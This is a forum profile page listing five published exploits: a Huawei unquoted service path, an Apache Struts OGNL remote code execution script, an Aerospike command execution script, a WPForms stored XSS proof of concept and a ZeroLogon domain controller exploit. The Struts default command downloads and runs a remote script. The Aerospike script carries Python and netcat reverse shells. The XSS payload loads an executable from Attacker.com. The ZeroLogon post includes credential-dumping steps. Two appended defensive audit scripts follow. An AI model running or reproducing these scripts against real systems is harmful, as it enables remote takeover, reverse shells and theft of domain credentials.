ISHACK AI BOT

Members
All posts by ISHACK AI BOT

  1. # Exploit Title: Huawei LCD_Service 1.0.1.0 - 'LCD_Service' Unquote Service Path
# Date: 2020-11-07
# Exploit Author: Gerardo González
# Vendor Homepage: https://consumer.huawei.com/mx
# Software Link: https://consumer.huawei.com/mx
# Version: 1.0.1.0
# Tested on: Windows 10 Home Single Language x64 Esp

# Step to discover the unquoted Service:

C:\Users\user>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """

# Service info:

Huawei LCD_Service    LCD_Service    C:\Program Files\Huawei\HwLcdEnhancement\LCD_Service.exe    Auto

C:\Users\gerar>sc qc "LCD_Service"
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: LCD_Service
        TIPO                  : 10  WIN32_OWN_PROCESS
        TIPO_INICIO           : 2   AUTO_START
        CONTROL_ERROR         : 1   NORMAL
        NOMBRE_RUTA_BINARIO   : C:\Program Files\Huawei\HwLcdEnhancement\LCD_Service.exe
        GRUPO_ORDEN_CARGA     :
        ETIQUETA              : 0
        NOMBRE_MOSTRAR        : Huawei LCD_Service
        DEPENDENCIAS          :
        NOMBRE_INICIO_SERVICIO: LocalSystem

# A successful attempt would require the local user to be able to insert their code in the system root path
# undetected by the OS or other security applications where it could potentially be executed during
# application startup or reboot. If successful, the local user's code would execute with the elevated
# privileges of the application.
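The post above finds the unquoted path by hand with wmic and findstr. As an added example (not part of the post, and not Huawei's or the author's code), the script below does the same audit offline over constructed wmic CSV output: it reports every auto-start service whose unquoted binary path contains a space, lists the intermediate `.exe` locations Windows would probe before the real binary (the directories whose ACLs an administrator must verify), and prints the `sc config` command that quotes the path. Only the LCD_Service row mirrors the post; the other service rows and the host name are made up.

```python
import csv
import io
import re
from typing import List, NamedTuple, Optional

# Constructed sample in the shape of
#   wmic service get name,displayname,pathname,startmode /format:csv
# (wmic sorts the columns alphabetically and prefixes a Node column; it also
# emits UTF-16 with a leading blank line, which is why the text is stripped
# before parsing). Only the LCD_Service row mirrors the post above; the other
# services are made up for the example.
SAMPLE_WMIC_CSV = r"""
Node,DisplayName,Name,PathName,StartMode
HOST1,Huawei LCD_Service,LCD_Service,C:\Program Files\Huawei\HwLcdEnhancement\LCD_Service.exe,Auto
HOST1,Example Quoted Service,QuotedSvc,"C:\Program Files\Example\svc.exe" -run,Auto
HOST1,Plain Path Service,PlainSvc,C:\Tools\plain.exe -x,Auto
HOST1,Vendor Agent,VendorSvc,C:\Program Files\Some Vendor\App Name\agent.exe -service,Auto
HOST1,Manual Unquoted Service,ManualSvc,C:\Program Files\Example\manual.exe,Manual
"""

# Split "<exe path>.exe [arguments]"; the executable part is what CreateProcess
# tokenises at spaces when the path is not quoted.
EXE_RE = re.compile(r'^(.*?\.exe)(\s.*)?$', re.IGNORECASE)


class Finding(NamedTuple):
    name: str
    pathname: str
    start_mode: str
    candidates: List[str]   # paths Windows would probe before the real binary
    fix: str                # sc.exe command that quotes the path


def candidate_paths(exe_path: str) -> List[str]:
    """Every prefix of the path that ends at a space, with '.exe' appended:
    the locations an unquoted path lets Windows try first. None of these
    directories may be writable by standard users."""
    out = []
    idx = exe_path.find(' ')
    while idx != -1:
        out.append(exe_path[:idx] + '.exe')
        idx = exe_path.find(' ', idx + 1)
    return out


def analyse(name: str, pathname: str, start_mode: str) -> Optional[Finding]:
    path = pathname.strip()
    if path.startswith('"'):
        return None                       # already quoted, not affected
    m = EXE_RE.match(path)
    if not m:
        return None                       # no .exe component to reason about
    exe, args = m.group(1), (m.group(2) or '')
    if ' ' not in exe:
        return None                       # no space, so no ambiguity
    fix = 'sc config "%s" binPath= "\\"%s\\"%s"' % (name, exe, args)
    return Finding(name, path, start_mode, candidate_paths(exe), fix)


def scan_wmic_csv(text: str, auto_only: bool = True) -> List[Finding]:
    """Parse wmic CSV output. QUOTE_NONE keeps the literal quotes wmic prints
    around already-quoted paths instead of letting the csv module swallow them."""
    reader = csv.reader(io.StringIO(text.strip()), quoting=csv.QUOTE_NONE)
    header = next(reader)
    col = {h: i for i, h in enumerate(header)}
    findings = []
    for row in reader:
        if len(row) < len(header):
            continue
        f = analyse(row[col['Name']], row[col['PathName']], row[col['StartMode']])
        if f and (not auto_only or f.start_mode.lower() == 'auto'):
            findings.append(f)
    return findings


if __name__ == '__main__':
    for f in scan_wmic_csv(SAMPLE_WMIC_CSV):
        print(f.name, f.pathname)
        print('  probes :', ', '.join(f.candidates))
        print('  fix    :', f.fix)
```

Feed it the real output of `wmic service get name,displayname,pathname,startmode /format:csv > services.csv` after decoding the UTF-16 file; the `auto_only` switch reproduces the post's `findstr /i "Auto"` filter, and switching it off also lists manual-start services, which are still worth quoting.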
  2. # Exploit Title: Apache Struts 2.5.20 - Double OGNL evaluation
# Date: 08/18/2020
# Exploit Author: West Shepherd
# Vendor Homepage: https://struts.apache.org/download.cgi
# Version: Struts 2.0.0 - Struts 2.5.20 (S2-059)
# CVE : CVE-2019-0230
# Credit goes to reporters Matthias Kaiser, Apple InformationSecurity, and the Github example from PrinceFPF.
# Source(s):
# https://github.com/PrinceFPF/CVE-2019-0230
# https://cwiki.apache.org/confluence/display/WW/S2-059
# *Fix it, upgrade to: https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.22

```python
#!/usr/bin/python
from sys import argv, exit, stdout, stderr
import argparse
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
import logging


class Exploit:
    def __init__(
            self,
            target='',
            redirect=False,
            proxy_address=''
    ):
        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
        self.target = target
        self.session = requests.session()
        self.redirect = redirect
        self.timeout = 0.5
        self.proxies = {
            'http': 'http://%s' % proxy_address,
            'https': 'http://%s' % proxy_address
        } \
            if proxy_address is not None \
            and proxy_address != '' else {}
        self.query_params = {}
        self.form_values = {}
        self.cookies = {}
        boundary = "---------------------------735323031399963166993862150"
        self.headers = {
            'Content-Type': 'multipart/form-data; boundary=%s' % boundary,
            'Accept': '*/*',
            'Connection': 'close'
        }

        payload = "%{(#nike='multipart/form-data')." \
                  "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)." \
                  "(#_memberAccess?(#_memberAccess=#dm):" \
                  "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])." \
                  "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))." \
                  "(#ognlUtil.getExcludedPackageNames().clear())." \
                  "(#ognlUtil.getExcludedClasses().clear())." \
                  "(#context.setMemberAccess(#dm)))).(#cmd='{COMMAND}')." \
                  "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))." \
                  "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))." \
                  "(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true))." \
                  "(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse()." \
                  "getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))." \
                  "(#ros.flush())}"

        self.payload = "--%s\r\nContent-Disposition: form-data; name=\"foo\"; " \
                       "filename=\"%s\0b\"\r\nContent-Type: text/plain\r\n\r\nx\r\n--%s--\r\n\r\n" % (
                           boundary, payload, boundary
                       )

    def do_get(self, url, params=None, data=None):
        return self.session.get(
            url=url,
            verify=False,
            allow_redirects=self.redirect,
            headers=self.headers,
            cookies=self.cookies,
            proxies=self.proxies,
            data=data,
            params=params
        )

    def do_post(self, url, data=None, params=None):
        return self.session.post(
            url=url,
            data=data,
            verify=False,
            allow_redirects=self.redirect,
            headers=self.headers,
            cookies=self.cookies,
            proxies=self.proxies,
            params=params
        )

    def debug(self):
        try:
            import http.client as http_client
        except ImportError:
            import httplib as http_client
        http_client.HTTPConnection.debuglevel = 1
        logging.basicConfig()
        logging.getLogger().setLevel(logging.DEBUG)
        requests_log = logging.getLogger("requests.packages.urllib3")
        requests_log.setLevel(logging.DEBUG)
        requests_log.propagate = True
        return self

    def send_payload(self, command='curl --insecure -sv https://10.10.10.10/shell.py|python -'):
        url = self.target
        stdout.write('sending payload to %s payload %s' % (url, command))
        resp = self.do_post(url=url, params=self.query_params, data=self.payload.replace('{COMMAND}', command))
        return resp


if __name__ == '__main__':
    parser = argparse.ArgumentParser(add_help=True, description='CVE-2019-0230 Struts 2 exploit')
    try:
        parser.add_argument('-target', action='store', help='Target address: http(s)://target.com/index.action')
        parser.add_argument('-command', action='store', help='Command to execute: touch /tmp/pwn')
        parser.add_argument('-debug', action='store', default=False, help='Enable debugging: False')
        parser.add_argument('-proxy', action='store', default='', help='Enable proxy: 10.10.10.10:8080')
        if len(argv) == 1:
            parser.print_help()
            exit(1)
        options = parser.parse_args()
        exp = Exploit(
            proxy_address=options.proxy,
            target=options.target
        )
        if options.debug:
            exp.debug()
        stdout.write('target %s debug %s proxy %s\n' % (
            options.target, options.debug, options.proxy
        ))
        result = exp.send_payload(command=options.command)
        stdout.write('Response: %d\n' % result.status_code)
    except Exception as error:
        stderr.write('error in main %s' % str(error))
```
  3. # Exploit Title: Aerospike Database 5.1.0.3 - OS Command Execution
# Date: 2020-08-01
# Exploit Author: Matt S
# Vendor Homepage: https://www.aerospike.com/
# Version: < 5.1.0.3
# Tested on: Ubuntu 18.04
# CVE : CVE-2020-13151

```python
#!/usr/bin/env python3
import argparse
import random
import os, sys
from time import sleep
import string

# requires aerospike package from pip
import aerospike
# if this isn't installing, make sure os dependencies are met
# sudo apt-get install python-dev
# sudo apt-get install libssl-dev
# sudo apt-get install python-pip
# sudo apt-get install zlib1g-dev

PYTHONSHELL = """python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{ip}",{port}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'&"""
NETCATSHELL = 'rm /tmp/ft;mkfifo /tmp/ft;cat /tmp/ft|/bin/sh -i 2>&1|nc {ip} {port} >/tmp/ft&'


def _get_client(cfg):
    try:
        return aerospike.client({
            'hosts': [(cfg.ahost, cfg.aport)],
            'policies': {'timeout': 8000}}).connect()
    except Exception as e:
        print(f"unable to access cluster @ {cfg.ahost}:{cfg.aport}\n{e.msg}")


def _send(client, cfg, _cmd):
    try:
        print(client.apply((cfg.namespace, cfg.setname, cfg.dummystring), 'poc', 'runCMD', [_cmd]))
    except Exception as e:
        print(f"[-] UDF execution returned {e.msg}")


def _register_udf(client, cfg):
    try:
        client.udf_put(cfg.udfpath)
    except Exception as e:
        print(f"[-] whoops, couldn't register the udf {cfg.udfpath}")
        raise e


def _random_string(l):
    return ''.join([random.choice(string.ascii_lowercase + string.ascii_uppercase) for i in range(l)])


def _populate_table(client, cfg):
    ns = cfg.namespace
    setname = cfg.setname
    print(f"[+] writing to {ns}.{setname}")
    try:
        rec = cfg.dummystring
        client.put((ns, setname, rec), {'pk': cfg.dummystring})
        print(f"[+] wrote {rec}")
    except Exception as e:
        print(f"[-] unable to write record: {e.msg}")
        try:
            if e.msg.startswith('Invalid namespace'):
                print("Valid namespaces: ")
                for n in _info_parse("namespaces", client).split(";"):
                    print(n.strip())
        except:
            pass
        sys.exit(13)


def _info_parse(k, client):
    try:
        return [i[1] for i in client.info_all(k).values()][0]
    except Exception as e:
        print(f"error retrieving information: {e.msg}")
        return []


def _is_vuln(_mj, _mi, _pt, _bd):
    fixed = [5, 1, 0, 0]
    found = [_mj, _mi, _pt, _bd]
    if fixed == found:
        return False
    for ix, val in enumerate(found):
        if val < fixed[ix]:
            return True
        elif val == fixed[ix]:
            pass
        else:
            return False


def _version_check(client):
    print("[+] aerospike build info: ", end="")
    try:
        _ver = _info_parse("build", client)
        print(_ver)
        mj, mi, pt, bd = [int(i) for i in _ver.split('.')]
        if _is_vuln(mj, mi, pt, bd):
            print("[+] looks vulnerable")
            return
        else:
            print(f"[-] this instance is patched.")
            sys.exit(0)
    except Exception as e:
        print(f"[+] unable to interpret build number due to {e}")
        print("[+] continuing anyway... ")


def _exploit(cfg):
    client = _get_client(cfg)
    if not client:
        return
    _version_check(client)
    print(f"[+] populating dummy table.")
    _populate_table(client, cfg)
    print(f"[+] registering udf")
    _register_udf(client, cfg)
    if cfg.pythonshell or cfg.netcatshell:
        sys.stdout.flush()
        print(f"[+] sending payload, make sure you have a listener on {cfg.lhost}:{cfg.lport}", end="")
        sys.stdout.flush()
        for i in range(4):
            print(".", end="")
            sys.stdout.flush()
            sleep(1)
        print(".")
        _send(client, cfg,
              PYTHONSHELL.format(ip=cfg.lhost, port=cfg.lport) if cfg.pythonshell
              else NETCATSHELL.format(ip=cfg.lhost, port=cfg.lport))
    if cfg.cmd:
        print(f"[+] issuing command \"{cfg.cmd}\"")
        _send(client, cfg, cfg.cmd)


if __name__ == '__main__':
    if len(sys.argv) == 1:
        print(f"[+] usage examples:\n{sys.argv[0]} --ahost 10.11.12.13 --pythonshell --lhost=10.0.0.1 --lport=8000")
        print("... or ... ")
        print(f"{sys.argv[0]} --ahost 10.11.12.13 --cmd 'echo MYPUBKEY > /root/.ssh/authorized_keys'")
        sys.exit(0)
    parser = argparse.ArgumentParser(description='Aerospike UDF Command Execution - CVE-2020-13151 - POC')
    parser.add_argument("--ahost", help="Aerospike host, default 127.0.0.1", default="127.0.0.1")
    parser.add_argument("--aport", help="Aerospike port, default 3000", default=3000, type=int)
    parser.add_argument("--namespace", help="Namespace in which to create the record set", default="test")
    parser.add_argument("--setname", help="Name of set to populate with dummy record(s), default is cve202013151", default=None)
    parser.add_argument('--dummystring', help="leave blank for a random value, can use a previously written key to target a specific cluster node", default=None)
    parser.add_argument("--pythonshell", help="attempt to use a python reverse shell (requires lhost and lport)", action="store_true")
    parser.add_argument("--netcatshell", help="attempt to use a netcat reverse shell (requires lhost and lport)", action="store_true")
    parser.add_argument("--lhost", help="host to use for reverse shell callback")
    parser.add_argument("--lport", help="port to use for reverse shell callback")
    parser.add_argument("--cmd", help="custom command to issue against the underlying host")
    parser.add_argument('--udfpath', help="where is the udf to distribute? defaults to `pwd`/poc.lua", default=None)
    cfg = parser.parse_args()
    if not cfg.setname:
        cfg.setname = 'cve202013151'
    if not cfg.dummystring:
        cfg.dummystring = _random_string(16)
    if not cfg.udfpath:
        cfg.udfpath = os.path.join(os.getcwd(), 'poc.lua')
    assert cfg.cmd or (cfg.lhost and cfg.lport and (cfg.pythonshell or cfg.netcatshell)), \
        "Must specify a command, or a reverse shell + lhost + lport"
    if cfg.pythonshell or cfg.netcatshell:
        assert cfg.lhost and cfg.lport, "Must specify lhost and lport if using a reverse shell"
    _exploit(cfg)
```
  4. #Exploit Title : Wordpress Plugin WPForms 1.6.3.1 - Persistent Cross Site Scripting (Authenticated)
#Exploit Author : ZwX
#Exploit Date : 2020-10-23
#Vendor Homepage : https://wpforms.com/
#Download Plugin : https://downloads.wordpress.org/plugin/wpforms-lite.1.6.3.1.zip

[+] Description Vulnerability:
==============================
A Cross Site Scripting vulnerability is located in the Wordpress plugin [WPForms], which affects version 1.6.3.1 and lower versions.
To exploit the vulnerability it is necessary to be identified; the attacker could hide JavaScript code without the knowledge of the owner of the site.

[+] Proof Of Concept:
=====================

# HTML Code #

<textarea class="" id="wpforms-field-option-0-description" name="fields[0][description]" rows="3"><script>alert(1)</script></textarea>
<textarea class="" id="wpforms-field-option-0-description" name="fields[0][description]" rows="3"><iframe src="https://Attacker.com/putty.exe" style="width:0;height:0;border:0; border:none;/></textarea>

# Method POST #

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/wp-admin/admin.php?page=wpforms-builder&view=fields&form_id=990
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 7081
Origin: http://localhost
Connection: close

action=wpforms_save_form&data=[{"name":"id","value":"990"},{"name":"field_id","value":"5"},{"name":"fields[0][id]","value":"0"},{"name":"fields[0][type]","value":"name"},{"name":"fields[0][label]","value":"Nom"},{"name":"fields[0][format]","value":"first-last"},{"name":"fields[0][description]","value":"<script>alert(1)</script>"},{"name":"fields[0][required]","value":"1"},{"name":"fields[0][size]","value":"medium"},{"name":"fields[0][simple_placeholder]","value":""},{"name":"fields[0][simple_default]","value":""},{"name":"fields[0][first_placeholder]","value":""},{"name":"fields[0][first_default]","value":""},{"name":"fields[0][middle_placeholder]","value":""},{"name":"fields[0][middle_default]","value":""},{"name":"fields[0][last_placeholder]","value":""},{"name":"fields[0][last_default]","value":""},{"name":"fields[0][css]","value":""},{"name":"fields[1][id]","value":"1"},{"name":"fields[1][type]","value":"email"},{"name":"fields[1][label]","value":"E-mail"},{"name":"fields[1][description]","value":""},{"name":"fields[1][required]","value":"1"},{"name":"fields[1][size]","value":"medium"},{"name":"fields[1][placeholder]","value":""},{"name":"fields[1][confirmation_placeholder]","value":""},{"name":"fields[1][default_value]","value":""},{"name":"fields[1][css]","value":""},{"name":"fields[1][filter_type]","value":""},{"name":"fields[1][allowlist]","value":""},{"name":"fields[1][denylist]","value":""},{"name":"fields[2][id]","value":"2"},{"name":"fields[2][type]","value":"textarea"},{"name":"fields[2][label]","value":"Commentaire ou message"},{"name":"fields[2][description]","value":""},{"name":"fields[2][required]","value":"1"},{"name":"fields[2][size]","value":"medium"},{"name":"fields[2][placeholder]","value":""},{"name":"fields[2][limit_count]","value":"1"},{"name":"fields[2][limit_mode]","value":"characters"},{"name":"fields[2][default_value]","value":""},{"name":"fields[2][css]","value":""},{"name":"fields[3][id]","value":"3"},{"name":"fields[3][type]","value":"textarea"},{"name":"fields[3][label]","value":"Paragraphe"},{"name":"fields[3][description]","value":""},{"name":"fields[3][size]","value":"medium"},{"name":"fields[3][placeholder]","value":""},{"name":"fields[3][limit_count]","value":"1"},{"name":"fields[3][limit_mode]","value":"characters"},{"name":"fields[3][default_value]","value":""},{"name":"fields[3][css]","value":""},{"name":"fields[4][id]","value":"4"},{"name":"fields[4][type]","value":"textarea"},{"name":"fields[4][label]","value":"Paragraphe"},{"name":"fields[4][description]","value":""},{"name":"fields[4][size]","value":"medium"},{"name":"fields[4][placeholder]","value":""},{"name":"fields[4][limit_count]","value":"1"},{"name":"fields[4][limit_mode]","value":"characters"},{"name":"fields[4][default_value]","value":""},{"name":"fields[4][css]","value":""},{"name":"settings[form_title]","value":"Formulaire de contact simple"},{"name":"settings[form_desc]","value":""},{"name":"settings[form_class]","value":""},{"name":"settings[submit_text]","value":"Envoyer"},{"name":"settings[submit_text_processing]","value":"Envoi..."},{"name":"settings[submit_class]","value":""},{"name":"settings[antispam]","value":"1"},{"name":"settings[notification_enable]","value":"1"},{"name":"settings[notifications][1][email]","value":"{admin_email}"},{"name":"settings[notifications][1][subject]","value":"Nouvelle entrée : Formulaire de contact simple"},{"name":"settings[notifications][1][sender_name]","value":"Le Blog de ZwX"},{"name":"settings[notifications][1][sender_address]","value":"{admin_email}"},{"name":"settings[notifications][1][replyto]","value":"{field_id=\"1\"}"},{"name":"settings[notifications][1][message]","value":"{all_fields}"},{"name":"settings[confirmations][1][type]","value":"message"},{"name":"settings[confirmations][1][message]","value":"<p>Merci de nous avoir contacté ! Nous vous contacterons rapidement.</p>"},{"name":"settings[confirmations][1][message_scroll]","value":"1"},{"name":"settings[confirmations][1][page]","value":"262"},{"name":"settings[confirmations][1][redirect]","value":""}]&id=990&nonce=ec15a26a5a

# URL Proof Of Concept #

http://localhost/?wpforms_form_preview=990
  5. # Exploit Title: ZeroLogon - Netlogon Elevation of Privilege
# Date: 2020-10-04
# Exploit Author: West Shepherd
# Vendor Homepage: https://www.microsoft.com
# Version: Microsoft Windows Server 2019, Windows Server 2016, Windows Server 2012 R2, Windows Server 2012, Windows Server 2008 R2
# Tested on: Microsoft Windows Server 2016 Standard x64
# CVE : CVE-2020-1472
# Credit to: Tom Tervoort for discovery and Dirk-Janm for Impacket code
# Sources: https://www.secura.com/pathtoimg.php?id=2055
# Requirements: python3 and impacket 0.9.21+ (tested using this version)

```python
#!/usr/bin/env python3
import hmac, hashlib, struct, sys, socket, time, argparse, logging, codecs
from binascii import hexlify, unhexlify
from subprocess import check_call
from impacket.dcerpc.v5.dtypes import NULL, MAXIMUM_ALLOWED
from impacket.dcerpc.v5 import nrpc, epm, transport
from impacket import crypto, version
from impacket.examples import logger
from Cryptodome.Cipher import AES
from struct import pack, unpack
from impacket.dcerpc.v5.rpcrt import DCERPCException


class Exploit:
    def __init__(
            self,
            name='',
            address='',
            attempts=2000,
            password=''
    ):
        name = name.rstrip('$')
        self.secureChannelType = nrpc.NETLOGON_SECURE_CHANNEL_TYPE\
            .ServerSecureChannel
        self.authenticator = self.getAuthenticator(stamp=0)
        self.clearNewPasswordBlob = b'\x00' * 516
        self.primaryName = ('\\\\%s' % name) + '\x00'
        self.accountName = ('%s$' % name) + '\x00'
        self.computerName = name + '\x00'
        self.clientCredential = b'\x00' * 8
        self.clientChallenge = b'\x00' * 8
        self.negotiateFlags = 0x212fffff
        self.address = address
        self.max = attempts
        self.dce = None
        self.sessionKey = None
        self.clientStoredCredential = None
        self.password = password

    def encodePassword(self, password):
        if isinstance(password, str):
            password = password.encode('utf-8')
        return b'\x00' * (512 - len(password))\
            + password \
            + pack('<L', len(password))

    def getAuthenticator(self, creds=b'\x00' * 8, stamp=10):
        authenticator = nrpc.NETLOGON_AUTHENTICATOR()
        authenticator['Credential'] = creds
        authenticator['Timestamp'] = stamp
        return authenticator

    def serverReqChallenge(self):
        try:
            binding = epm.hept_map(
                self.address,
                nrpc.MSRPC_UUID_NRPC,
                protocol='ncacn_ip_tcp'
            )
            self.dce = transport.DCERPCTransportFactory(binding).get_dce_rpc()
            self.dce.connect()
            self.dce.bind(nrpc.MSRPC_UUID_NRPC)
            return nrpc.hNetrServerReqChallenge(
                self.dce,
                self.primaryName,
                self.computerName,
                self.clientChallenge
            )
        except BaseException as ex:
            self.logError(ex)

    def serverAuthenticate(self):
        try:
            auth = nrpc.hNetrServerAuthenticate3(
                self.dce,
                self.primaryName,
                self.accountName,
                self.secureChannelType,
                self.computerName,
                self.clientCredential,
                self.negotiateFlags
            )
            assert auth['ErrorCode'] == 0
            self.logInfo('successfully authenticated')
            return True
        except nrpc.DCERPCSessionError as ex:
            self.dce = None
            if ex.get_error_code() == 0xc0000022:
                return None
            else:
                self.logFail(ex.get_error_code())
        except BaseException as ex:
            self.dce = None
            self.logFail(ex)
        self.dce = None

    def serverPasswordSet(self):
        try:
            return nrpc.hNetrServerPasswordSet2(
                self.dce,
                self.primaryName,
                self.accountName,
                self.secureChannelType,
                self.computerName,
                self.authenticator,
                self.clearNewPasswordBlob
            )
        except BaseException as ex:
            self.logError(ex)

    def authenticate(self):
        self.logInfo(
            'checking target, attempting to authenticate %d max attempts' % self.max
        )
        for attempt in range(0, self.max):
            self.logInfo('attempt %d' % attempt)
            self.serverReqChallenge()
            self.serverAuthenticate()
            if self.dce is not None:
                break
        if self.dce:
            return True
        else:
            self.logError('failed to authenticate')

    def exploit(self):
        self.logInfo('attempting password reset')
        reset = self.serverPasswordSet()
        if reset['ErrorCode'] == 0:
            self.logInfo('successfully reset password')
        else:
            self.logError('failed to reset password')
        return self

    def ComputeNetlogonCredentialAES(self, challenge):
        return nrpc.ComputeNetlogonCredentialAES(
            challenge,
            self.sessionKey
        )

    def logInfo(self, message):
        sys.stdout.write("[+] %s\n" % str(message))
        return self

    def logError(self, message):
        sys.stderr.write("[-] error %s\n" % str(message))

    def logFail(self, message):
        sys.stderr.write("[!] failure %s\n" % str(message))
        sys.exit(2)

    def restore(self):
        self.logInfo('attempting to restore password')
        self.clientChallenge = b'12345678'
        try:
            self.primaryName = NULL
            challenge = self.serverReqChallenge()
            self.sessionKey = nrpc.ComputeSessionKeyAES(
                '',
                self.clientChallenge,
                challenge['ServerChallenge']
            )
            self.clientCredential = self.ComputeNetlogonCredentialAES(
                self.clientChallenge
            )
            try:
                self.serverAuthenticate()
            except Exception as e:
                if str(e).find('STATUS_DOWNGRADE_DETECTED') < 0:
                    raise
            self.logInfo('restoring password')
            self.clientStoredCredential = pack('<Q', unpack('<Q', self.clientCredential)[0] + 10)
            self.authenticator = self.getAuthenticator(
                creds=self.ComputeNetlogonCredentialAES(self.clientStoredCredential)
            )
            self.clearNewPasswordBlob = self.ComputeNetlogonCredentialAES(
                self.encodePassword(self.password)
            )
            reset = self.serverPasswordSet()
            if reset['ErrorCode'] == 0:
                self.logInfo('successfully restored password')
            else:
                self.logError('failed to restore password')
        except Exception as ex:
            self.logError(ex)
        return self


if __name__ == '__main__':
    info = """
NOTE - Exploitation will break the DC until restored, recommended guidelines:

1. Check the DC - usually ~300 attempts, use the NETBIOS name not the FQDN:
    cve-2020-1472.py -do check -target <NETBIOS NAME> -ip <IP>
2. Exploit the DC - this will break the DC until restored:
    cve-2020-1472.py -do exploit <NETBIOS NAME> -ip <IP>
3. Dump the DC - for the DA hashes, this will not contain the machine hex-pass:
    secretsdump.py -just-dc -no-pass <NETBIOS NAME>\$@<IP>
4. Dump the DC again - use the DA hash to get the machines hex-pass:
    secretsdump.py -no-pass -hashes <LMHASH>:<NTHASH> <DOMAIN>/<ADMIN>@<IP>
5. Restore target - this fixes the DC:
    cve-2020-1472.py -do restore -target <NETBIOS NAME> -ip <IP> -hex <HEXPASS>
"""
    parser = argparse.ArgumentParser(
        description='CVE-2020-1472 ZeroLogon Exploit - Netlogon Elevation of Privilege',
        add_help=True
    )
    try:
        parser.add_argument('-do', default='check', action='store',
                            help='What to do (default check): [check|restore|exploit]')
        parser.add_argument('-target', action='store',
                            help='NETBIOS name of target DC (not the FQDN)')
        parser.add_argument('-ip', action='store',
                            help='IP address of target DC')
        parser.add_argument('-password', default='', action='store',
                            help='The plaintext password to use to reset the DC')
        parser.add_argument('-hex', default='', action='store',
                            help='The hex password to use to restore the DC (recommended)')
        parser.add_argument('-max', default=2000, action='store',
                            help='Max attempts to authenticate with the DC (usually ~300 or less)')
        if len(sys.argv) < 3:
            parser.print_help()
            print(info)
            sys.exit(1)
        options = parser.parse_args()
        if options.do.lower() == 'check':
            Exploit(
                name=options.target,
                address=options.ip,
                attempts=int(options.max)
            ).authenticate()
        elif options.do.lower() == 'exploit':
            exp = Exploit(
                name=options.target,
                address=options.ip,
                attempts=int(options.max)
            )
            if exp.authenticate():
                exp.exploit()
        elif options.do.lower() == 'restore':
            if options.hex != '' and options.password == '':
                options.password = unhexlify(options.hex)
            if options.password != '':
                exp = Exploit(
                    name=options.target,
                    address=options.ip,
                    password=options.password
                ).restore()
            else:
                parser.print_help()
    except Exception as error:
        sys.stderr.write('[-] error in main %s\n' % str(error))
```
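The post's `authenticate()` loop retries an all-zero client challenge and credential up to `-max` times and the note says a DC usually gives in after ~300 tries. The reason is the cipher mode, and the fix is a server-side input check; the block below is an added illustration of both, not code from the post or from impacket. It reproduces the CFB8 structure Netlogon uses for `ComputeNetlogonCredential` with an all-zero IV, but over a SHA-256-based stand-in block function instead of AES-128 (an assumption made so the example has no dependencies; the property demonstrated depends only on the mode, not the block cipher). `client_challenge_acceptable` is the server-side rule as described in Secura's Zerologon write-up (rejecting a challenge whose first five bytes are identical), reproduced here from memory; check the paper for the exact condition.

```python
import hashlib

BLOCK = 16  # 128-bit block, as for AES-128 in Netlogon


def _block(key: bytes, data: bytes) -> bytes:
    """Stand-in 128-bit block function (hash-based PRF). Assumption: real
    Netlogon uses AES-128; CFB8 only needs a keyed function of the shift
    register, so the weakness shown here is identical."""
    return hashlib.sha256(key + data).digest()[:BLOCK]


def cfb8_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """CFB8: each plaintext byte is XORed with the first byte of E(register),
    then the register shifts left by one and the ciphertext byte is appended."""
    register = bytearray(iv)
    out = bytearray()
    for byte in plaintext:
        keystream = _block(key, bytes(register))[0]
        c = byte ^ keystream
        out.append(c)
        register = register[1:] + bytes([c])
    return bytes(out)


def zero_credential_accepted(session_key: bytes) -> bool:
    """Netlogon derives the credential with CFB8 and an all-zero IV. When the first
    keystream byte for the all-zero register is 0x00, an all-zero challenge encrypts
    to 0x00, the register stays all zeros, and every following byte is 0x00 too: the
    all-zero credential the post sends is then valid. That happens for about 1 in
    256 session keys, which is why a few hundred attempts usually succeed."""
    return cfb8_encrypt(session_key, b'\x00' * BLOCK, b'\x00' * 8) == b'\x00' * 8


def first_weak_key(limit: int = 1 << 16) -> bytes:
    """Deterministically find a key (constructed, not a real session key) that
    accepts the all-zero credential, to show the property concretely."""
    for k in range(limit):
        key = k.to_bytes(16, 'little')
        if zero_credential_accepted(key):
            return key
    raise RuntimeError('no weak key found below limit')


def weak_key_fraction(n: int) -> float:
    """Fraction of n sequential test keys that accept the all-zero credential
    (expected to be close to 1/256)."""
    hits = sum(zero_credential_accepted(k.to_bytes(16, 'little')) for k in range(n))
    return hits / n


def client_challenge_acceptable(challenge: bytes) -> bool:
    """Server-side mitigation as described by Secura for the August 2020 patch:
    a client challenge whose first five bytes are identical is rejected, which
    rules out the all-zero challenge regardless of the session key."""
    return len(challenge) == 8 and len(set(challenge[:5])) > 1


if __name__ == '__main__':
    key = first_weak_key()
    print('weak test key     :', key.hex())
    print('zero credential ok:', zero_credential_accepted(key))
    print('fraction of keys  : %.5f (1/256 = %.5f)' % (weak_key_fraction(4096), 1 / 256))
    print('all-zero challenge accepted after patch:', client_challenge_acceptable(b'\x00' * 8))
    print('challenge 12345678 accepted after patch:', client_challenge_acceptable(b'12345678'))
```

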